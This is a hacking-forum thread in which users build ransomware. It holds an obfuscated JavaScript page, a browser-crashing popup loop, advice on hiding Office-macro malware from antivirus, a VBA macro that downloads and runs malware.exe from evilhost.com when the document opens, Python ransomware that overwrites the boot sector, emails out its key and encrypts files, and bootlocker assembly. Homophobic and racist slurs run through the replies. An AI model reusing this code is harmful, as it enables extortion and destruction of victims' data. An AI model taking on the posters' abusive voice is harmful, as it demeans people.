User Controls
Let's talk crypto.
-
2016-03-29 at 1:34 AM UTC
Is this your ransomware, Sophie?
http://money.cnn.com/2016/03/28/tech...hospital-hack/
I wish. I lol'd when i read that though.It's basically harmless. Just a fork bomb.
Yeah i remember from redfern, thanks but no thanks. -
2016-03-29 at 2:28 AM UTC
Yeah i remember from redfern, thanks but no thanks.
C'mon, now.
-
2016-03-29 at 4:53 PM UTCTen points to the person who knows how I encrypted it in such a way that any browser can still parse it.
-
2016-03-29 at 5 PM UTCspectroll, go make your own thread for your cunt pasted skiddy shit you've been bragging about for years instead of hijacking this one so we can ignore you in peace
-
2016-03-29 at 5:06 PM UTC
spectroll, go make your own thread for your cunt pasted skiddy shit you've been bragging about for years instead of hijacking this one so we can ignore you in peace
The title says, "Let's talk crypto".
-
2016-03-31 at 5:51 PM UTC
spectroll, go make your own thread for your cunt pasted skiddy shit you've been bragging about for years instead of hijacking this one so we can ignore you in peace
At this point i just think he does it for the attention. -
2016-03-31 at 6:13 PM UTC
At this point i just think he does it for the attention.
And yet you two are the only ones grossly off-topic in this thread. Funny how that happens, eh?
-
2016-03-31 at 6:25 PM UTC
And yet you two are the only ones grossly off-topic in this thread. Funny how that happens, eh?
That's right but in response to your faggotry. I would have moved all your bullshit posts from this thread to the trash can if this were Zoklet. You're lucky Lanny has a higher tolerance for skidiots and chronic failtrolls than i do.
inb4 hurr durr MAWD ABUSEY, hurr durr turnip trucks hurr durr you singlehandedly killed zoklet -
2016-03-31 at 6:41 PM UTC
That's right but in response to your faggotry. I would have moved all your bullshit posts from this thread to the trash can if this were Zoklet. You're lucky Lanny has a higher tolerance for skidiots and chronic failtrolls than i do.
inb4 hurr durr MAWD ABUSEY, hurr durr turnip trucks hurr durr you singlehandedly killed zoklet
Aside from all your bluster, you're an off-topic faggit kidiot. You get what you deserve.
-
2016-04-01 at 4:42 AM UTC
Aside from all your bluster, you're an off-topic faggit kidiot. You get what you deserve.
Kill yourself, i post more quality content in a week than you do in a year.
-
2016-04-01 at 6:11 AM UTC
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<script language="JavaScript">
<!--
function ZOKLock()
{
var h=new Array
(
'<!--*******************************************',
' This page protected by Yomoma ZokLock ',
' Copyright (C) Yomoma Software Co. 2001-2002 ',
' http://www.disney.com/ ',
'********************************************-->',
//Page Begin
'6B',
't!3E 35~U42u"(38$664543GG6533;: :39y,39&.?,3E%65j03+;3813;: :39{~U42uk`tMR4543,3837#,!&$m0A39350D;38"+hq454331@S`x:,3E38+.x3C;?(62MR3544',
'@@S3731&-%:w/36-;38"+`65h1A33 1C32*27;q@SMR3E(38m0A39351A,+!0E)360739/#y}x? $)3637v2739/#62MR4543,3837#,!&$m0A39351F $02)%36`3C38!u`36)$/61',
'y!,3C;#/,343D;`GG"MRhi38(-35*&i62#3C37x07+ (:34p61`q@S3DU4244@:30.3C273E64")%36htj1E -0F!27053D3C.634543GGvou65wGG65o++;#3D-~U4244@q*#',
'*!393Em1501160F1C0B0A1C}z02(3C,0A#*!393Eoy130A0Bth3D+/,66#39og|w;*38$)34664543v39303434-w19"y0D39&30j0F+//;,383Ey1337h05#39-,3Dh1D# 3C|w3C 3E!3C~U42',
'u65%3C!3Cv44@q;/3C31i(,:+?:&?#3D}z.3D:wvo3E3D*!(3Dn3027393E"w/*/66,,32%.!;?3Ew*(/kj/3E#37$&38p{63hxyz}i62U423D/35-}zk0F0C0B1F061Eji&',
'$37+65jjy~ov61qkj;35)36#thnjsn~psoy!34!27!p{63n~7F|{o62664543v+363235h$/3931/3Cuk1A020A14zv44@my`xt39j,35)?&th.3C.,-;hs65)36383C3Em-',
'39(-th0F,34,2727hm*)"-th7Fi62x%(32!3C.?3C!wokunji$,34%65j+3E#18.362730hm/!343D,wo1A,31+"j 3Cnv660Em,31%39,kGGy`xh&$.35);#th,35%*',
'3C61m1A31/+h10%38+`1527$27,66gqs44@;3832x+iwmh{U42?+?y,39un1E%3834+h1E38"3727x0F3C/3E*`19/(##y063727%mvTJ.);j37#:xuim1E-35(!-mvTJ/ ',
'&(qsxn.3Evy#qh323C,+`(htj3D+/35383D62j0E(37h 39m-(3Dh.38(38343D;3Dj193634+-($m3C363D:vj0C-343D%393Emzgs+65jj09323D38(38(y&37:i39 30343Do`q@',
'S)3E`39jp64`"32336336:}kx34j@S%34;,j3630&p38iwp35!q33*w~i3Dx-%39(y#x6362373062)3E`39jp64`"3233633638,3D:3D62j`qiqx{thq7F6134j@S%34;,j3630&',
'p38iwpy,396132+!3C32,`n06181A0B01h0F1F0E12140F011Dm64$`U42,&3E3C`#)%/?-h7F01i-383C33+h30%38y,37;,64m1E/37,+33(y.37?gm6462MR3E(38m3003373D273E(+}hs',
'3E"$35%p3C;?(p3731&-%:w/(-2762j3134,38s6562.37/66/+*3E/,66*% ~i%35rh@S`xhi)?383330!27-or);273C$393C32po3E#)-(65jx66%3C)? 3Dw|u323D; 30',
',;,3Du27%jp{310B&?#-%*63626330$66)3D&3Ev{~64g39t@S|w.&38 gMRt66("3D39664543GG6533;: :39y,39&.?,3E%65j03+;3813;: :39{~U42uk`tMR45433D$37',
'$37?g%3D3C.xui193434123D)%1D$370F(-27q@SMRg66g`gMRt6639.+)(3CwGGTJ64g!3E 35~'
);
//Page End
var pw='default';
var t='\00\01\02\03\04\05\06\07\010\t\n\013\014\r\016\017\020\021\022\023\024\025\026\027\030\031\032\033\034\035\036\037\040!\042#$%&\047()*+,-./0123456789:;\074=\076?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\134]^_`abcdefghijklmnopqrstuvwxyz{|}~€Â‚ƒ„…†‡ˆ‰Š‹ŒÂŽÂ‘’“â€â€¢â€“—˜™š›œÂžŸ*¡¢£¤¥¦§¨©ª«¬*®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÃÂÃÄÅÆÇÈÉÊËÌÃÃŽÃÃÑÒÓÔÕÖ×ØÙÚÛÜÃÞßà áâãäåæçèéêëìÃîïðñòóôõö÷øùúûüýþÿ';
var x='0123456789ABCDEF';
var i,j,xs;
var c=0;
for(i=0;i<pw.length;i++)
c=c^t.indexOf(pw.charAt(i));
if(c!=parseInt(h[5].charAt(0)+h[5].charAt(1),16))
{
}
for(i=0;i<5;i++)
document.writeln(h[i]);
for(i=0;i<40;i++)
document.writeln();
var n=pw.length;
var m=0;
var s='';
for(j=6;j<h.length;j++)
{
for(i=0;i<h[j].length;i++)
{
xs=h[j].charAt(i)
if(x.indexOf(xs)>=0)
{
i++;xs=xs+h[j].charAt(i);c=parseInt(xs,16);
}
else
c=t.indexOf(xs);
c=c^44^t.indexOf(pw.charAt(m));
m++;
if(m==n)
m=0;
if(c==13)
{
document.writeln(s);s='';
}
else if(c==10)
{
;
}
else
s=s+t.charAt(c);
}
}
document.writeln(s);
return true;
}
var ie=0;
if(navigator.appName.indexOf('Microsoft')>=0)
{
ie=1;ZOKLock();
}
function ZOKLock2()
{
if(ie==0)
ZOKLock();
}
// -->
</script></head><body onLoad="ZOKLock2();"></body></html>
<html>
<head>
<script language="JavaScript">
<!-- function SymError() { return true; } window.onerror = SymError; var SymRealWinOpen = window.open; function SymWinOpen(url, name, attributes) { return (new Object()); } window.open = SymWinOpen; //-->
</script>
<script LANGUAGE="JavaScript" SRC="prot.js"></script>
<title>So Many Browsers So Little Time</title>
</head>
<body background="ftp://fucked.hopto.org/fakevirus.jpg" bgcolor="#000000" text="#FFFFFF" link="#336699" vlink="#336699" alink="#666666">
<form method="POST">
<p align="center"><input type="Button" size="20" maxlength="256" name="btnAnnoy" value="Click me...G'ahead" onclick="alert('Whos Your Momma?'); var c = 1; var la='Thats Wrong Guess Again Fool'; var zzz = 'Stupid'; while(3 > c) {var p = prompt('Who is the greatest Totsean ever? Attempt #'+c, 'Prepare for smite'); if(p == zzz){c=30} else {if(p ==la){c=30} else c ++}};if(p == zzz){alert('911911911')} else {if(p == la){alert('LUCKY FUCKTWIT')} else {alert('I guess you lose. Goodbye now.'); var iCounter=0;while(true)window.open('http://www.faggot.com')}};" crashing"+icounter('width="1,height=1,resizable=no');iCounter++)}}""></p>
</form>
</body>
<script language="JavaScript">
<!-- window.open = SymRealWinOpen; //-->
</script>
</html>
-
2016-04-01 at 2:32 PM UTC
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<script language="JavaScript">
<!--
function ZOKLock()
{
var h=new Array
(
'<!--*******************************************',
' This page protected by Yomoma ZokLock ',
' Copyright (C) Yomoma Software Co. 2001-2002 ',
' http://www.disney.com/ ',
'********************************************-->',
//Page Begin
'6B',
't!3E 35~U42u"(38$664543GG6533;: :39y,39&.?,3E%65j03+;3813;: :39{~U42uk`tMR4543,3837#,!&$m0A39350D;38"+hq454331@S`x:,3E38+.x3C;?(62MR3544',
'@@S3731&-%:w/36-;38"+`65h1A33 1C32*27;q@SMR3E(38m0A39351A,+!0E)360739/#y}x? $)3637v2739/#62MR4543,3837#,!&$m0A39351F $02)%36`3C38!u`36)$/61',
'y!,3C;#/,343D;`GG"MRhi38(-35*&i62#3C37x07+ (:34p61`q@S3DU4244@:30.3C273E64")%36htj1E -0F!27053D3C.634543GGvou65wGG65o++;#3D-~U4244@q*#',
'*!393Em1501160F1C0B0A1C}z02(3C,0A#*!393Eoy130A0Bth3D+/,66#39og|w;*38$)34664543v39303434-w19"y0D39&30j0F+//;,383Ey1337h05#39-,3Dh1D# 3C|w3C 3E!3C~U42',
'u65%3C!3Cv44@q;/3C31i(,:+?:&?#3D}z.3D:wvo3E3D*!(3Dn3027393E"w/*/66,,32%.!;?3Ew*(/kj/3E#37$&38p{63hxyz}i62U423D/35-}zk0F0C0B1F061Eji&',
'$37+65jjy~ov61qkj;35)36#thnjsn~psoy!34!27!p{63n~7F|{o62664543v+363235h$/3931/3Cuk1A020A14zv44@my`xt39j,35)?&th.3C.,-;hs65)36383C3Em-',
'39(-th0F,34,2727hm*)"-th7Fi62x%(32!3C.?3C!wokunji$,34%65j+3E#18.362730hm/!343D,wo1A,31+"j 3Cnv660Em,31%39,kGGy`xh&$.35);#th,35%*',
'3C61m1A31/+h10%38+`1527$27,66gqs44@;3832x+iwmh{U42?+?y,39un1E%3834+h1E38"3727x0F3C/3E*`19/(##y063727%mvTJ.);j37#:xuim1E-35(!-mvTJ/ ',
'&(qsxn.3Evy#qh323C,+`(htj3D+/35383D62j0E(37h 39m-(3Dh.38(38343D;3Dj193634+-($m3C363D:vj0C-343D%393Emzgs+65jj09323D38(38(y&37:i39 30343Do`q@',
'S)3E`39jp64`"32336336:}kx34j@S%34;,j3630&p38iwp35!q33*w~i3Dx-%39(y#x6362373062)3E`39jp64`"3233633638,3D:3D62j`qiqx{thq7F6134j@S%34;,j3630&',
'p38iwpy,396132+!3C32,`n06181A0B01h0F1F0E12140F011Dm64$`U42,&3E3C`#)%/?-h7F01i-383C33+h30%38y,37;,64m1E/37,+33(y.37?gm6462MR3E(38m3003373D273E(+}hs',
'3E"$35%p3C;?(p3731&-%:w/(-2762j3134,38s6562.37/66/+*3E/,66*% ~i%35rh@S`xhi)?383330!27-or);273C$393C32po3E#)-(65jx66%3C)? 3Dw|u323D; 30',
',;,3Du27%jp{310B&?#-%*63626330$66)3D&3Ev{~64g39t@S|w.&38 gMRt66("3D39664543GG6533;: :39y,39&.?,3E%65j03+;3813;: :39{~U42uk`tMR45433D$37',
'$37?g%3D3C.xui193434123D)%1D$370F(-27q@SMRg66g`gMRt6639.+)(3CwGGTJ64g!3E 35~'
);
//Page End
var pw='default';
var t='\00\01\02\03\04\05\06\07\010\t\n\013\014\r\016\017\020\021\022\023\024\025\026\027\030\031\032\033\034\035\036\037\040!\042#$%&\047()*+,-./0123456789:;\074=\076?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\134]^_`abcdefghijklmnopqrstuvwxyz{|}~€Â‚ƒ„…†‡ˆ‰Š‹ŒÂŽÂ‘’“â€â€¢â€“—˜™š›œÂžŸ*¡¢£¤¥¦§¨©ª«¬*®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÃÂÃÄÅÆÇÈÉÊËÌÃÃŽÃÃÑÒÓÔÕÖ×ØÙÚÛÜÃÞßà áâãäåæçèéêëìÃîïðñòóôõö÷øùúûüýþÿ';
var x='0123456789ABCDEF';
var i,j,xs;
var c=0;
for(i=0;i<pw.length;i++)
c=c^t.indexOf(pw.charAt(i));
if(c!=parseInt(h[5].charAt(0)+h[5].charAt(1),16))
{
}
for(i=0;i<5;i++)
document.writeln(h[i]);
for(i=0;i<40;i++)
document.writeln();
var n=pw.length;
var m=0;
var s='';
for(j=6;j<h.length;j++)
{
for(i=0;i<h[j].length;i++)
{
xs=h[j].charAt(i)
if(x.indexOf(xs)>=0)
{
i++;xs=xs+h[j].charAt(i);c=parseInt(xs,16);
}
else
c=t.indexOf(xs);
c=c^44^t.indexOf(pw.charAt(m));
m++;
if(m==n)
m=0;
if(c==13)
{
document.writeln(s);s='';
}
else if(c==10)
{
;
}
else
s=s+t.charAt(c);
}
}
document.writeln(s);
return true;
}
var ie=0;
if(navigator.appName.indexOf('Microsoft')>=0)
{
ie=1;ZOKLock();
}
function ZOKLock2()
{
if(ie==0)
ZOKLock();
}
// -->
</script></head><body onLoad="ZOKLock2();"></body></html>
<html>
<head>
<script language="JavaScript">
<!-- function SymError() { return true; } window.onerror = SymError; var SymRealWinOpen = window.open; function SymWinOpen(url, name, attributes) { return (new Object()); } window.open = SymWinOpen; //-->
</script>
<script LANGUAGE="JavaScript" SRC="prot.js"></script>
<title>So Many Browsers So Little Time</title>
</head>
<body background="ftp://fucked.hopto.org/fakevirus.jpg" bgcolor="#000000" text="#FFFFFF" link="#336699" vlink="#336699" alink="#666666">
<form method="POST">
<p align="center"><input type="Button" size="20" maxlength="256" name="btnAnnoy" value="Click me...G'ahead" onclick="alert('Whos Your Momma?'); var c = 1; var la='Thats Wrong Guess Again Fool'; var zzz = 'Stupid'; while(3 > c) {var p = prompt('Who is the greatest Totsean ever? Attempt #'+c, 'Prepare for smite'); if(p == zzz){c=30} else {if(p ==la){c=30} else c ++}};if(p == zzz){alert('911911911')} else {if(p == la){alert('LUCKY FUCKTWIT')} else {alert('I guess you lose. Goodbye now.'); var iCounter=0;while(true)window.open('http://www.faggot.com')}};" crashing"+icounter('width="1,height=1,resizable=no');iCounter++)}}""></p>
</form>
</body>
<script language="JavaScript">
<!-- window.open = SymRealWinOpen; //-->
</script>
</html>
Of course you are fee to post what you want. But seeing as i value your expertise and appreciate and respect your opinion in the infosec/programming field i was hoping you'd share your thoughts on crypto and ransomware in general. If you have anything interesting to add i'd love to hear about. Just ignore spectral, he's just a skid trying to look cool.
For delivery of the ransomware i had the folling in mind:
A common vector for the delivery of malware is via Word/Excel macro. Obfuscating/encrypting the source code of your malware itself is obviously very important. Not only for opsec purposes but the longer it takes researchers/AV companies to reverse engineer your malware the longer it will stay effective. If your delivery mechanism is through a downloader embedded in an Office document adding obfuscation and encryption not only protects against reverse engineering but aids in evading AV heuristics as well. To that end i've found a python implementation that not only obfuscates your VBA code but automatically generates an Office document based on a template and inserts your downloader within it. What's more, it's fully customizable. It's features are as follows;- Encrypt all strings present in your VBA code
- Encrypt data from your python Script in VBA code (domain names or paths for example)
- Randomize each functions' (or variables) names
- Choose Encryption method, how and where encryption keys are stored
- Generate as many unique MS Office documents as you want using a file name list and a document template
- Enable autodestruction of encryption Keys feature once the VBA has been triggered once
As i understand it, the way it works is as follows. The python script reads in a VB script and looks for certain tags within the code. Based on the tags it performs an operation like randomizing a variable or function name, for instance:
Function [rdm::10]Test() '=> Test() will become randomized with a 10 characters string
[rdm::4]String_1 = "Test" '=> String_1 wil lbecome randomized with a 4 characters string
Depending on the values you set in config.py a type of encryption is selected among a number of other settings. Here's a screenshot of the script in action.
Pretty cool if you ask me, here's a link to the relevant repo on github. https://github.com/Pepitoh/VBad
Now doing some research into malware deployed in this manner and relevant code examples written in VB Script i kind of tried to nigger rig the following based on code found here.
https://github.com/CloudStrief/xcode...doc/skript.txt
Option Explicit
Public CN As String
Public APD As String
Public UN As String
Public HOSTNAME As String
Public DROPPER_EXE As String
Public PAYLOADS_FOLDER As String
Public PAYLOAD_FILE As String
Function InitMe()
DROPPER_EXE = "malware.exe"
HOSTNAME = "http://www.evilhost.com/code"
PAYLOADS_FOLDER = HOSTNAME & "/payloads/"
CN = Environ("COMPUTERNAME")
APD = Environ("TMP")
UN = Environ("USERNAME")
End Function
Sub Document_Open()
InitMe
Dim val As String
Dim FN As String
PayLoad (APD + DROPPER_EXE)
Dim oShell
Set oShell = CreateObject("WScript.Shell")
oShell.Run APD + DROPPER_EXE
FN = APD
On Error GoTo 0
End Sub
Private Sub writeBytes(file, bytes)
Dim binaryStream
Set binaryStream = CreateObject("ADODB.Stream")
binaryStream.Type = 1
binaryStream.Open
binaryStream.Write bytes
binaryStream.SaveToFile file, 2
End Sub
Function getPayload(val As String, FN As String)
Dim WinHttpReq As Object
Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
WinHttpReq.Open "GET", PAYLOADS_FOLDER & DROPPER_EXE
WinHttpReq.SetRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
WinHttpReq.SetRequestHeader "Accept", "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
WinHttpReq.SetRequestHeader "Accept-Language", "en-us,en;q=0.5"
WinHttpReq.SetRequestHeader "Accept-Charset", "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
WinHttpReq.send
writeBytes FN, WinHttpReq.ResponseBody
End Function
This is probably full of errors since i don't have a clue about Visual Basic/VBA/VBS so i was wondering if you could help me improve this particular block of code. Interestingly enough the original repo contains all you need including malware itself written in python and everything you need server side to deploy this. If you're interested here's a link to the complete project.
https://github.com/CloudStrief/xcode -
2016-04-01 at 3:33 PM UTC
<!– function SymError() { return true; } window.onerror = SymError; var SymRealWinOpen = window.open; function SymWinOpen(url, name, attributes) { return (new Object()); } window.open = SymWinOpen; //–>
</script>
You one smart cookie. Is your name really... Oddballz194... by any chance? Not many people can do what you just did thar.
-
2016-04-01 at 3:45 PM UTC
You one smart cookie. Is your name really… Oddballz194… by any chance? Not many people can do what you just did thar.
You should know who aldra is if you've been keeping up. I know your turnip truck routes go back far enough for that. -
2016-04-01 at 4:48 PM UTC
You should know who aldra is if you've been keeping up. I know your turnip truck routes go back far enough for that.
I'mma still gonna guess Oddballz_194. Call me crazy.
If I had to take a second guess, I'd have to go with Fish. -
2016-09-11 at 4:44 PM UTC*Resurrects thread*
Ahh, when this idea was still just that, an idea.
import os
import sys
import random
import struct
import smtplib
import string
import datetime
import time
import getpass as gp
from Crypto.Cipher import AES
from Crypto.PublicKey import RSA
from multiprocessing import Pool
ID = ''
key = RSA.generate(2048)
exKey = RSA.exportKey('PEM')
if sys.platform == 'linux2' and gp.getuser() == 'root':
try:
os.system("dd if=boot.bin of=/dev/hda bs=512 count=1 && exit")
except:
pass
else:
try:
os.system("sudo dd if=boot.bin of=/dev/hda bs=512 count=1 && exit")
except:
pass
def gen_client_ID(size=12, chars=string.ascii_uppercase + string.digits):
global ID
ID = ''.join(random.choice(chars) for _ in range(size))
def send_ID_Key():
ts = datetime.datetime.now()
SERVER = "smtp.gmail.com"
PORT = 587
USER= "address@gmail.com" # Specify Username Here
PASS= "prettyflypassword" # Specify Password Here
FROM = USER
TO = ["address@gmail.com"]
SUBJECT = "Ransomware data: "+str(ts)
MESSAGE = """\Client ID: %s Decryption Key: %s """ % (ID, exKey)
message = """\ From: %s To: %s Subject: %s %s """ % (FROM, ", ".join(TO), SUBJECT, MESSAGE)
try:
server = smtplib.SMTP()
server.connect(SERVER, PORT)
server.starttls()
server.login(USER, PASS)
server.sendmail(FROM, TO, message)
server.quit()
except Exception as e:
# print e
pass
def encrypt_file(key, in_filename, out_filename=None, chunksize=64*1024):
if not out_filename:
out_filename = in_filename + '.crypt'
iv = ''.join(chr(random.randint(0, 0xFF)) for i in range(16))
encryptor = AES.new(key, AES.MODE_CBC, iv)
filesize = os.path.getsize(in_filename)
with open(in_filename, 'rb') as infile:
with open(out_filename, 'wb') as outfile:
outfile.write(struct.pack('<Q', filesize))
outfile.write(iv)
while True:
chunk = infile.read(chunksize)
if len(chunk) == 0:
break
elif len(chunk) % 16 != 0:
chunk += ' ' * (16 - len(chunk) % 16)
outfile.write(encryptor.encrypt(chunk))
def single_arg_encrypt_file(in_filename):
encrypt_file(key, in_filename)
def selectfiles():
ext = [".3g2", ".3gp", ".asf", ".asx", ".avi", ".flv",
".m2ts", ".mkv", ".mov", ".mp4", ".mpg", ".mpeg",
".rm", ".swf", ".vob", ".wmv" ".docx", ".pdf",".rar",
".jpg",".jpeg",".png", ".tiff", ".zip", ".7z", ".exe",
".tar.gz", "tar", ".mp3", ".sh", ".c", ".h", ".txt"]
files_to_enc = []
for root, dirs, files in os.walk("/"):
for file in files:
if file.endswith(tuple(ext)):
files_to_enc.push(os.path.join(root, file))
pool = Pool(processes=4)
pool.map(single_arg_encrypt_file, files_to_enc)
def note():
readme = """
.d8888b. 888
d88P Y88b 888
888 888 888
888 888 888 88888b. 88888b. .d88b. 888d888
888 888 888 888 "88b 888 "88b d8P Y8b 888P"
888 888 888 888 888 888 888 888 88888888 888
Y88b d88P Y88b 888 888 d88P 888 888 Y8b. 888
"Y8888P" "Y88888 88888P" 888 888 "Y8888 888
888 888
Y8b d88P 888
"Y88P" 888
Hello, unfortunately all your personal files have been encrypted with millitary grade encryption and will be impossible to retrieve
without aquiring the encryption key and decrypting binary. As of yet these are not available to you since the Cypher ransomware is
still under construction. We thank you for your patience.
Have a nice day,
The Cypher Project."""
# Windows variant
# outdir = os.getenv('USERNAME') + "\\Desktop"
outdir = os.getenv('HOME') + "/Desktop/"
outfile = outdir + "README"
handler = open(outputfile, 'w')
handler.write(outfile, ID)
handler.close()
if __name__=="__main__":
gen_client_ID()
send_ID_Key()
try:
selectfiles()
note()
except Exception as e:
pass
Bootlocker source in asm.
[BITS 16]
[ORG 0x7C00]
MOV SI, Msg
CALL OutStr
JMP $
OutChar:
MOV AH, 0x0E
MOV BH, 0x00
MOV BL, 0x07
INT 0x10
RET
OutStr:
next_char:
MOV AL, [SI]
INC SI
OR AL, AL
JZ exit_function
CALL OutChar
JMP next_char
exit_function:
RET
Msg db 0xA, 0xD, 0xA, 0xD
db '########################################################', 0xA, 0xD
db '# Your harddrive is encrypted with military grade #', 0xA, 0xD
db '# encryption, you wont get your files back, since #', 0xA, 0xD
db '# the Cypher ransomware is still under construction #', 0xA, 0xD
db ' ', 0xA, 0xD
db '########################################################', 0xA, 0xD, 0xA, 0xD
db 'Unfortunately there are only 7 days left until the encryption key is destroyed.', 0xA, 0xD, 0xA, 0xD
db 'Have a nice day,', 0xA, 0xD
db ' The Cypher Project', 0
TIMES 510 - ($ - $$) db 0
DW 0xAA55
Compile ASM with NASM to boot.bin
I think i did a pretty good job so far. -
2023-06-07 at 12:59 AM UTClet us
-
2023-06-07 at 2:24 AM UTCno you guys dont know shit all u gotta do is draw an ellipse and connect 2 pointz
-
2023-06-11 at 3:54 AM UTC
-
2023-06-11 at 4:41 AM UTC
